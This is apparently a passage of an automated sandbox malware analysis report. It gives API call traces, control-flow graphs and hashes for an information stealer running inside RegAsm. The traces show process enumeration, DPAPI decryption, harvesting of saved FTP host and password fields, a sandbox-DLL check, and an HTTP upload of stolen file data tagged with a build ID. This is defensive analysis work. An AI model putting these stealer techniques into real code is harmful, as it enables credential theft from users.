                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0000013C,00417E31,.exe,00436CCC,00436CC8,00436CC4,00436CC0,00436CBC,00436CB8,00436CB4,00436CB0,00436CAC,00436CA8,00436CA4), ref: 004125A8
                                                                                      • Process32First.KERNEL32(00000000,00000128), ref: 004125B8
                                                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 004125CA
                                                                                      • StrCmpCA.SHLWAPI(?), ref: 004125DC
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 004125F0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
                                                                                      • String ID:
                                                                                      • API String ID: 1799959500-0
                                                                                      • Opcode ID: c9d347d910f7b4a70f950499f2b0cdb52079f09d3bb31312a8c8ade1b0a83c2a
                                                                                      • Instruction ID: d2a27fa508e6c3a354df25509a6f4190b9582d57abc1eee0c1e907853c614cd1
                                                                                      • Opcode Fuzzy Hash: c9d347d910f7b4a70f950499f2b0cdb52079f09d3bb31312a8c8ade1b0a83c2a
                                                                                      • Instruction Fuzzy Hash: 3B0162316002249BDB619B60DD44FEA76FD9B14301F8400E6E40DD2251EA798F949B25
                                                                                      APIs
                                                                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0040823B), ref: 004080C4
                                                                                      • LocalAlloc.KERNEL32(00000040,0040823B,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080D8
                                                                                      • LocalFree.KERNEL32(0040CB95,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080FD
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Local$AllocCryptDataFreeUnprotect
                                                                                      • String ID: DPAPI
                                                                                      • API String ID: 2068576380-1690256801
                                                                                      • Opcode ID: 68541e4e27b52eb825a4d6409286c391da9f85c95d41b42c5068ab7ee50209a7
                                                                                      • Instruction ID: 09c146c598fe2db9e3360274f95d94fd5a71afecc77b7c133579c0d37eeb6d97
                                                                                      • Opcode Fuzzy Hash: 68541e4e27b52eb825a4d6409286c391da9f85c95d41b42c5068ab7ee50209a7
                                                                                      • Instruction Fuzzy Hash: 5901ECB5A01218EFCB04DFA8D88489EBBB9FF48754F158466E906E7341D7719F05CB90
                                                                                      APIs
                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00436712,?,?), ref: 004114D4
                                                                                      • Process32First.KERNEL32(00000000,00000128), ref: 004114E4
                                                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 00411542
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0041154D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcpy
                                                                                      • String ID:
                                                                                      • API String ID: 907984538-0
                                                                                      • Opcode ID: 6ecd6e103f958e55985b85a8d6cec58a1d4901635c4c4c9a6a92631ed1d39a01
                                                                                      • Instruction ID: df159de601ea63d42004a6701442e9789206b56ac97d0af79a31bc2d218e3f7e
                                                                                      • Opcode Fuzzy Hash: 6ecd6e103f958e55985b85a8d6cec58a1d4901635c4c4c9a6a92631ed1d39a01
                                                                                      • Instruction Fuzzy Hash: FB117371A00214ABDB21EB65DC85BED73A9AB48308F400097F905A3291DB78AEC59B69
                                                                                      APIs
                                                                                      • GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00410D49
                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00410D50
                                                                                      • GetTimeZoneInformation.KERNEL32(?), ref: 00410D5F
                                                                                      • wsprintfA.USER32 ref: 00410D7D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                                                      • String ID:
                                                                                      • API String ID: 362916592-0
                                                                                      • Opcode ID: 8121b2989182859caeafca9d685060af6f757cf6148b1a30633017c65544c455
                                                                                      • Instruction ID: 3462f644bc87497e0213169472e2bde5c7d2207eb6d596ae75af8f0473202e49
                                                                                      • Opcode Fuzzy Hash: 8121b2989182859caeafca9d685060af6f757cf6148b1a30633017c65544c455
                                                                                      • Instruction Fuzzy Hash: 78F0E070A0132467EB04DFB4EC49B9B37659B04729F100295F511D71D0EB759E848785
                                                                                      APIs
                                                                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C5F
                                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,004013B9), ref: 00410C66
                                                                                      • GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C7A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Heap$AllocNameProcessUser
                                                                                      • String ID:
                                                                                      • API String ID: 1206570057-0
                                                                                      • Opcode ID: 51a8186674da40b627bafe0667fb054b0b372cb9ea4a64be279c17a6e1cb1c3a
                                                                                      • Instruction ID: a2d0142ef4c2f8337792e91bc85231d42bd55b383edadc254ac7c872ecc74bf6
                                                                                      • Opcode Fuzzy Hash: 51a8186674da40b627bafe0667fb054b0b372cb9ea4a64be279c17a6e1cb1c3a
                                                                                      • Instruction Fuzzy Hash: 33D05EB6200208BBD7449BD5EC8DF8E7BBCEB85725F100265FA46D2290DAF099488B34
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: InfoSystemwsprintf
                                                                                      • String ID:
                                                                                      • API String ID: 2452939696-0
                                                                                      • Opcode ID: 67b530403a9dc94f78866dc1dd254330b8edc701593f238e5f24d625af2237fc
                                                                                      • Instruction ID: 6e5c45132ae1b45d6529ef5bd4d0c5c9796b2e2d3bf3e93bb3fd0621c026135a
                                                                                      • Opcode Fuzzy Hash: 67b530403a9dc94f78866dc1dd254330b8edc701593f238e5f24d625af2237fc
                                                                                      • Instruction Fuzzy Hash: E8E092B0D1020D9BCF04DF60EC459DE77FCEB08208F4055B5A505E3180D674AB89CF44
                                                                                      APIs
                                                                                      • lstrcmpiW.KERNEL32(?,?,?,?,?,?,00401503,avghookx.dll,00418544), ref: 004014DF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: lstrcmpi
                                                                                      • String ID:
                                                                                      • API String ID: 1586166983-0
                                                                                      • Opcode ID: 01ffdcfc4a170f1596b26d300e4d9eeb94101c14574aad42e0c58a83c969e199
                                                                                      • Instruction ID: b529297655fd12c0b63a16027a5c7bdef515ed443d31e096b8a78f326fd23762
                                                                                      • Opcode Fuzzy Hash: 01ffdcfc4a170f1596b26d300e4d9eeb94101c14574aad42e0c58a83c969e199
                                                                                      • Instruction Fuzzy Hash: C1F08C32A00150EBCF20CF59D804AAAFBB8EB43760F257065E809B3260C334ED11EA9C

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 29 405482-405593 call 4104e7 call 410519 call 404ab6 call 411e5d lstrlenA call 411e5d call 4104e7 * 4 StrCmpCA 48 405595 29->48 49 40559b-4055a1 29->49 48->49 50 4055a3-4055b8 InternetOpenA 49->50 51 4055be-4056ce call 411c4a call 4105c7 call 41058d call 402920 * 2 call 410609 call 4105c7 call 410609 call 41058d call 402920 * 3 call 410609 call 4105c7 call 41058d call 402920 * 2 InternetConnectA 49->51 50->51 52 405e64-405eec call 402920 * 4 call 410519 call 402920 * 3 50->52 51->52 118 4056d4-405712 HttpOpenRequestA 51->118 87 405eee-405f2e call 402920 * 6 call 41d016 52->87 119 405e58-405e5e InternetCloseHandle 118->119 120 405718-40571e 118->120 119->52 121 405720-405736 InternetSetOptionA 120->121 122 40573c-405d77 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 lstrlenA * 2 GetProcessHeap HeapAlloc lstrlenA call 427050 lstrlenA call 427050 lstrlenA * 2 call 427050 lstrlenA HttpSendRequestA HttpQueryInfoA 120->122 121->122 309 405db5-405dc5 call 411afd 122->309 310 405d79-405db0 call 4104e7 call 402920 * 3 122->310 316 405dcb-405dd0 309->316 317 405f2f 309->317 310->87 318 405e11-405e2e InternetReadFile 316->318 320 405e30-405e43 StrCmpCA 318->320 321 405dd2-405dda 318->321 324 405e45-405e46 ExitProcess 320->324 325 405e4c-405e52 InternetCloseHandle 320->325 321->320 323 405ddc-405e0c call 410609 call 41058d call 402920 321->323 323->318 325->119
                                                                                      APIs
                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                        • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                        • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                        • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                        • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                        • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                        • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                      • lstrlenA.KERNEL32(?), ref: 00405519
                                                                                        • Part of subcall function 00411E5D: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,00000000,0065E908,?,?,?,004128A1,?,?,00000000), ref: 00411E7D
                                                                                        • Part of subcall function 00411E5D: GetProcessHeap.KERNEL32(00000000,?,?,?,?,004128A1,?,?,00000000), ref: 00411E8A
                                                                                        • Part of subcall function 00411E5D: HeapAlloc.KERNEL32(00000000,?,?,?,004128A1,?,?,00000000), ref: 00411E91
                                                                                      • StrCmpCA.SHLWAPI(?,00436986,0043697B,0043697A,0043696F), ref: 00405588
                                                                                      • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004055AA
                                                                                      • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004056C0
                                                                                      • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00405704
                                                                                      • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405736
                                                                                        • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                        • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                        • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                        • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                        • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                      • lstrlenA.KERNEL32(?,",file_data,00437850,------,00437844,?,",00437838,------,0043782C,e90840a846d017e7b095f7543cdf2d15,",build_id,00437814,------), ref: 00405C67
                                                                                      • lstrlenA.KERNEL32(?), ref: 00405C7A
                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00405C92
                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00405C99
                                                                                      • lstrlenA.KERNEL32(?), ref: 00405CA6
                                                                                      • _memmove.LIBCMT ref: 00405CB4
                                                                                      • lstrlenA.KERNEL32(?,?,?), ref: 00405CC9
                                                                                      • _memmove.LIBCMT ref: 00405CD6
                                                                                      • lstrlenA.KERNEL32(?), ref: 00405CE4
                                                                                      • lstrlenA.KERNEL32(?,?,00000000), ref: 00405CF2
                                                                                      • _memmove.LIBCMT ref: 00405D05
                                                                                      • lstrlenA.KERNEL32(?,?,00000000), ref: 00405D1A
                                                                                      • HttpSendRequestA.WININET(?,?,00000000), ref: 00405D2D
                                                                                      • HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 00405D6F
                                                                                      • InternetReadFile.WININET(?,?,000007CF,?), ref: 00405E26
                                                                                      • StrCmpCA.SHLWAPI(?,block), ref: 00405E3B
                                                                                      • ExitProcess.KERNEL32 ref: 00405E46
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: lstrlen$Internetlstrcpy$Heap$HttpProcess_memmove$AllocOpenRequestlstrcat$BinaryConnectCrackCryptExitFileInfoOptionQueryReadSendString
                                                                                      • String ID: ------$"$"$"$"$--$------$------$------$------$ERROR$ERROR$block$build_id$e90840a846d017e7b095f7543cdf2d15$file_data
                                                                                      • API String ID: 2638065154-3688182045
                                                                                      • Opcode ID: 728df9254f14c32eb0309421fbc2d51be9a45682cb524dc00f6aca4526101756
                                                                                      • Instruction ID: a1f310b16752a75a1e3861b17425502ee47d614580a36b5f1e1f8e1f13a41955
                                                                                      • Opcode Fuzzy Hash: 728df9254f14c32eb0309421fbc2d51be9a45682cb524dc00f6aca4526101756
                                                                                      • Instruction Fuzzy Hash: 3742E671D401699BDF21FB21DC45ACDB3B9BF04308F0085E6A548B3152DAB86FCA9F98

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                        • Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                        • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                        • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                        • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                        • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                        • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                        • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                        • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                        • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                        • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                        • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                        • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                        • Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37
                                                                                      • strtok_s.MSVCRT ref: 0040E77E
                                                                                      • GetProcessHeap.KERNEL32(00000000,000F423F,00436912,0043690F,0043690E,0043690D), ref: 0040E7C4
                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 0040E7CB
                                                                                      • StrStrA.SHLWAPI(00000000,<Host>), ref: 0040E7DF
                                                                                      • lstrlenA.KERNEL32(00000000), ref: 0040E7EA
                                                                                      • StrStrA.SHLWAPI(00000000,<Port>), ref: 0040E81E
                                                                                      • lstrlenA.KERNEL32(00000000), ref: 0040E829
                                                                                      • StrStrA.SHLWAPI(00000000,<User>), ref: 0040E857
                                                                                      • lstrlenA.KERNEL32(00000000), ref: 0040E862
                                                                                      • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040E890
                                                                                      • lstrlenA.KERNEL32(00000000), ref: 0040E89B
                                                                                      • lstrlenA.KERNEL32(?), ref: 0040E901
                                                                                      • lstrlenA.KERNEL32(?), ref: 0040E915
                                                                                      • lstrlenA.KERNEL32(0040ECBC), ref: 0040EA3D
                                                                                        • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                        • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
